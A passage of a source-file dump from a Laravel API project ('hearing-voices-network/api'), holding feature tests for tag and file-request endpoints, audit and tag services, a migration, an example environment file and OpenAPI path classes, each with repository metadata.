*/\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/tags');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed all tags.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Store.\n */\n\n /** @test */\n public function guest_cannot_store(): void\n {\n $response = $this->postJson('/v1/tags');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n 
$response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function structure_correct_for_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_store(): void\n {\n $now = Date::now();\n Date::setTestNow($now);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $response->assertJsonFragment([\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n 'public_contributions_count' => 0,\n 'created_at' => $now->toIso8601String(),\n 'updated_at' => $now->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function can_have_second_level_tag_for_store(): void\n {\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => $parentTag->id,\n 'name' => 'Child tag',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n $response->assertJsonFragment([\n 'parent_tag_id' => $parentTag->id,\n 'name' => 'Child tag',\n 'public_contributions_count' => 0,\n ]);\n }\n\n /** @test */\n public function cannot_have_third_level_tag_for_store(): void\n {\n /** @var \\App\\Models\\Tag $parentTag */\n $parentTag = factory(Tag::class)->create([\n 'parent_tag_id' => factory(Tag::class)->create()->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => $parentTag->id,\n 'name' => 'Child tag',\n ]);\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('parent_tag_id');\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_store(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $response = $this->postJson('/v1/tags', [\n 'parent_tag_id' => null,\n 'name' => 'Child tag',\n ]);\n\n $tag = Tag::findOrFail($response->getId());\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($tag, $user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Created tag [{$tag->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Show.\n */\n\n /** @test */\n public function guest_can_show(): void\n {\n $tag = factory(Tag::class)->create();\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function end_user_can_show(): void\n {\n $tag = factory(Tag::class)->create();\n\n 
Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_show(): void\n {\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n $tag = factory(Tag::class)->create();\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertJsonStructure([\n 'data' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $response = $this->getJson(\"/v1/tags/{$tag->id}\");\n\n $response->assertJson([\n 'data' => [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/tags/{$tag->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $tag): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed tag [{$tag->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Destroy.\n */\n\n /** @test */\n public function guest_cannot_destroy(): void\n {\n $tag = factory(Tag::class)->create();\n\n $response = $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_destroy(): void\n {\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_destroy(): void\n {\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function database_records_and_relationships_deleted_for_force_destroy(): void\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 
'force_delete']);\n\n $this->assertDatabaseMissing('tags', ['id' => $tag->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n }\n\n /** @test */\n public function database_records_and_relationships_not_deleted_for_soft_destroy(): void\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'soft_delete']);\n\n $this->assertSoftDeleted('tags', ['id' => $tag->id]);\n $this->assertDatabaseHas('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_force_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs($user);\n\n $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'force_delete']);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $tag): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Force deleted tag [{$tag->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_soft_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n Passport::actingAs($user);\n\n $this->deleteJson(\"/v1/tags/{$tag->id}\", ['type' => 'soft_delete']);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $tag): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Soft deleted tag [{$tag->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5490883588790894,
"alphanum_fraction": 0.5536465644836426,
"avg_line_length": 25.90566062927246,
"blob_id": "524b7d3c913eb8dd02566135cfd7a4f56748961e",
"content_id": "70a8bdb06ae9e758f9feb48d30e2a4209f4e9be0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2852,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 106,
"path": "/tests/Feature/V1/File/RequestControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\File;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\File;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass RequestControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_request(): void\n {\n $file = factory(File::class)->state('private')->create();\n\n $response = $this->postJson(\"/v1/files/{$file->id}/request\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_request(): void\n {\n $file = factory(File::class)->state('private')->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->postJson(\"/v1/files/{$file->id}/request\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_request(): void\n {\n $file = factory(File::class)->state('private')->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson(\"/v1/files/{$file->id}/request\");\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function structure_correct_for_request(): void\n {\n $file = factory(File::class)->state('private')->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson(\"/v1/files/{$file->id}/request\");\n\n $response->assertResourceDataStructure([\n 'token',\n 'download_url',\n 'expires_at',\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_request(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->state('private')->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->postJson(\"/v1/files/{$file->id}/request\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $file): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Requested file [{$file->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6593406796455383,
"alphanum_fraction": 0.6703296899795532,
"avg_line_length": 8.100000381469727,
"blob_id": "adcd5cb6f954e0bd48c59df23526ae320b827291",
"content_id": "6c2b2ea296606c73a5948dbc977628c1795d8e0c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 91,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/UserScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait UserScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5139240622520447,
"alphanum_fraction": 0.5151898860931396,
"avg_line_length": 22.939393997192383,
"blob_id": "1b6f952d79e5f5dade52aa402969612539b7b89d",
"content_id": "e27061db71dcaf94329bad1af58f73bdf8576ac7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 790,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 33,
"path": "/app/Services/AuditService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Audit\\AuditCreated;\nuse App\\Models\\Audit;\n\nclass AuditService\n{\n /**\n * @param array $data\n * @return \\App\\Models\\Audit\n */\n public function create(array $data): Audit\n {\n /** @var \\App\\Models\\Audit $audit */\n $audit = Audit::create([\n 'user_id' => $data['user_id'] ?? null,\n 'client_id' => $data['client_id'] ?? null,\n 'action' => $data['action'],\n 'description' => $data['description'] ?? null,\n 'ip_address' => $data['ip_address'],\n 'user_agent' => $data['user_agent'] ?? null,\n 'created_at' => $data['created_at'],\n ]);\n\n event(new AuditCreated($audit));\n\n return $audit;\n }\n}\n"
},
{
"alpha_fraction": 0.6454545259475708,
"alphanum_fraction": 0.6465908885002136,
"avg_line_length": 24.14285659790039,
"blob_id": "1a67988e30dc81a8da74a314ef4ee78ab81ece2a",
"content_id": "db96b47b840c8477a28b1a9f28fa7bcdeb30ab95",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 880,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 35,
"path": "/database/migrations/2019_05_28_171238_create_contribution_statuses_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateContributionStatusesTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('contribution_statuses', function (Blueprint $table): void {\n $table->string('status')->primary();\n });\n\n $contributionStatusesPath = realpath(dirname(__DIR__)) . '/storage/contribution_statuses.json';\n\n DB::table('contribution_statuses')->insert(\n json_decode(file_get_contents($contributionStatusesPath), true)\n );\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('contribution_statuses');\n }\n}\n"
},
{
"alpha_fraction": 0.7564338445663452,
"alphanum_fraction": 0.779411792755127,
"avg_line_length": 17.440677642822266,
"blob_id": "cd3c5a3bfc21400937b8dcadaa175057be400b1e",
"content_id": "7ea57d8d5fc2e9cfe8ac113cc95dd22b99b9a07a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1088,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 59,
"path": "/.env.example",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Application environment.\nAPP_ENV=local\n# Encryption key.\nAPP_KEY=\n# If debug mode should be enabled.\nAPP_DEBUG=true\n# The application URL, needed when using the CLI.\nAPP_URL=http://localhost\n# The frontend web app URL.\nFRONTEND_URL=\n# The admin web app URL.\nADMIN_URL=http://localhost:3000\n\n# Logging config.\nLOG_CHANNEL=single\n\n# Database config.\nDB_HOST=mysql\nDB_PORT=3306\nDB_DATABASE=connecting_voices\nDB_USERNAME=connecting_voices\nDB_PASSWORD=secret\n\n# Cache config.\nCACHE_DRIVER=redis\n# Redis credentials.\nREDIS_HOST=redis\nREDIS_PASSWORD=null\nREDIS_PORT=6379\n\n# Queue config.\nQUEUE_CONNECTION=database\n\n# Session config.\nSESSION_DRIVER=database\nSESSION_LIFETIME=120\n\n# Email config.\nMAIL_DRIVER=log\nMAIL_HOST=smtp.mailtrap.io\nMAIL_PORT=2525\nMAIL_USERNAME=null\nMAIL_PASSWORD=null\nMAIL_ENCRYPTION=null\n\n# SMS config.\nSMS_DRIVER=log\n\n# Filesystem config.\nFILESYSTEM_DRIVER=local\nFILESYSTEM_CLOUD=local_cloud\n# AWS S3 credentials.\nAWS_S3_ACCESS_KEY_ID=\nAWS_S3_SECRET_ACCESS_KEY=\nAWS_S3_DEFAULT_REGION=eu-west-1\nAWS_S3_BUCKET=\n\n# Authentication config.\nOTP_ENABLED=true\n"
},
{
"alpha_fraction": 0.6374269127845764,
"alphanum_fraction": 0.6382623314857483,
"avg_line_length": 31.351350784301758,
"blob_id": "273bfbff96dfca0f0345f47f3a02aa5b6687dcc8",
"content_id": "43111551d1921fe5af8b210e4316d83fd5651086",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1197,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 37,
"path": "/app/Docs/Paths/Tags/TagsNestedPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Tags;\n\nuse App\\Docs\\Operations\\Tags\\DestroyTagOperation;\nuse App\\Docs\\Operations\\Tags\\ShowTagOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass TagsNestedPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/tags/{tag}')\n ->parameters(\n Parameter::path()\n ->name('tag')\n ->description('The ID of the tag')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required()\n )\n ->operations(\n ShowTagOperation::create(),\n DestroyTagOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6647972464561462,
"alphanum_fraction": 0.66566002368927,
"avg_line_length": 30.75342559814453,
"blob_id": "4b19ee0dd09f37788272419fc34344ff3e143ca7",
"content_id": "79a6e0c612437b12fc94192d7d41af01f3cb1a5f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2318,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 73,
"path": "/app/Http/Controllers/V1/NotificationController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\Notification\\AdminIdFilter;\nuse App\\Http\\Filters\\Notification\\EndUserIdFilter;\nuse App\\Http\\Resources\\NotificationResource;\nuse App\\Models\\Notification;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\n\nclass NotificationController extends ApiController\n{\n /**\n * NotificationController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n $this->authorizeResource(Notification::class);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(Request $request): ResourceCollection\n {\n $baseQuery = Notification::query()\n ->with('user.admin', 'user.endUser');\n\n $notifications = QueryBuilder::for($baseQuery)\n ->allowedFilters([\n Filter::exact('id'),\n Filter::custom('admin_id', AdminIdFilter::class),\n Filter::custom('end_user_id', EndUserIdFilter::class),\n ])\n ->allowedSorts([\n 'created_at',\n ])\n ->defaultSort('-created_at')\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all notifications.'));\n\n return NotificationResource::collection($notifications);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Notification $notification\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Notification $notification): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed notification [{$notification->id}].\"));\n\n return new NotificationResource($notification);\n }\n}\n"
},
{
"alpha_fraction": 0.5725429058074951,
"alphanum_fraction": 0.5741029381752014,
"avg_line_length": 20.366666793823242,
"blob_id": "8100e0eb5e7da77196b3d5e720cbf6b6e796b2b5",
"content_id": "17a4812f88a04e8cc608de671976d80f0cadeb48",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 641,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 30,
"path": "/app/Http/Requests/EndUser/DestroyEndUserRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\EndUser;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass DestroyEndUserRequest extends FormRequest\n{\n const TYPE_SOFT_DELETE = 'soft_delete';\n const TYPE_FORCE_DELETE = 'force_delete';\n\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'type' => [\n 'bail',\n 'required',\n Rule::in([static::TYPE_SOFT_DELETE, static::TYPE_FORCE_DELETE]),\n ],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6459330320358276,
"alphanum_fraction": 0.6475279331207275,
"avg_line_length": 25.125,
"blob_id": "ea7420c0a1b66b063a9aa0f6f8e5562ca6dd3d4b",
"content_id": "7ee76e5858a1d9407b838cad87396a139a68648e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 627,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 24,
"path": "/app/Http/Filters/Admin/EmailFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\Admin;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass EmailFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param string $email\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $email, string $property): Builder\n {\n return $query->whereHas('user', function (Builder $query) use ($email): void {\n $query->where('email', 'LIKE', \"%{$email}%\");\n });\n }\n}\n"
},
{
"alpha_fraction": 0.6868686676025391,
"alphanum_fraction": 0.6969696879386902,
"avg_line_length": 8.899999618530273,
"blob_id": "a75f837d67ea9736408aff20632795d6a5d457a9",
"content_id": "06ebb67b7cd42ca7a186104aabdb17d7ec65948c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 99,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/ContributionScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait ContributionScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5195488929748535,
"alphanum_fraction": 0.5203007459640503,
"avg_line_length": 20.11111068725586,
"blob_id": "1b72d8973b92a660db8f7bb1a35f5963888577eb",
"content_id": "fc83f3844c3f541528594f927156127a9b960b46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1330,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 63,
"path": "/app/Services/TagService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Tag\\TagCreated;\nuse App\\Events\\Tag\\TagForceDeleted;\nuse App\\Events\\Tag\\TagSoftDeleted;\nuse App\\Models\\Tag;\n\nclass TagService\n{\n /**\n * @param array $data\n * @return \\App\\Models\\Tag\n */\n public function create(array $data): Tag\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = Tag::create([\n 'parent_tag_id' => $data['parent_tag_id'] ?? null,\n 'name' => $data['name'],\n ]);\n\n event(new TagCreated($tag));\n\n return $tag;\n }\n\n /**\n * @param \\App\\Models\\Tag $tag\n * @throws \\Exception\n * @return \\App\\Models\\Tag\n */\n public function softDelete(Tag $tag): Tag\n {\n $tag->delete();\n $tag->childTags()->each(function (Tag $tag): void {\n $tag->delete();\n });\n\n event(new TagSoftDeleted($tag));\n\n return $tag;\n }\n\n /**\n * @param \\App\\Models\\Tag $tag\n * @throws \\Exception\n */\n public function forceDelete(Tag $tag): void\n {\n $tag->contributions()->sync([]);\n $tag->childTags()->each(function (Tag $tag): void {\n $tag->contributions()->sync([]);\n $tag->forceDelete();\n });\n $tag->forceDelete();\n\n event(new TagForceDeleted($tag));\n }\n}\n"
},
{
"alpha_fraction": 0.679438054561615,
"alphanum_fraction": 0.6807152032852173,
"avg_line_length": 28,
"blob_id": "4775a6ad06e74b2e6193755c8ca606a5831f9ddc",
"content_id": "80c7c4b6f4533b2b559576e237358d7e01e146f3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 783,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 27,
"path": "/app/Docs/Paths/Admins/AdminsMePath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Admins;\n\nuse App\\Docs\\Operations\\Admins\\ShowAdminOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass AdminsMePath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/admins/me')\n ->operations(\n ShowAdminOperation::create()\n ->summary('Got the authenticated admin')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5835109949111938,
"alphanum_fraction": 0.5842217206954956,
"avg_line_length": 20,
"blob_id": "f875391c14059fa5805e2b08b40a60172a5fd677",
"content_id": "9b6e4b15c56795c778dfbde3f98e0887f37e66df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1407,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 67,
"path": "/app/Models/Setting.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
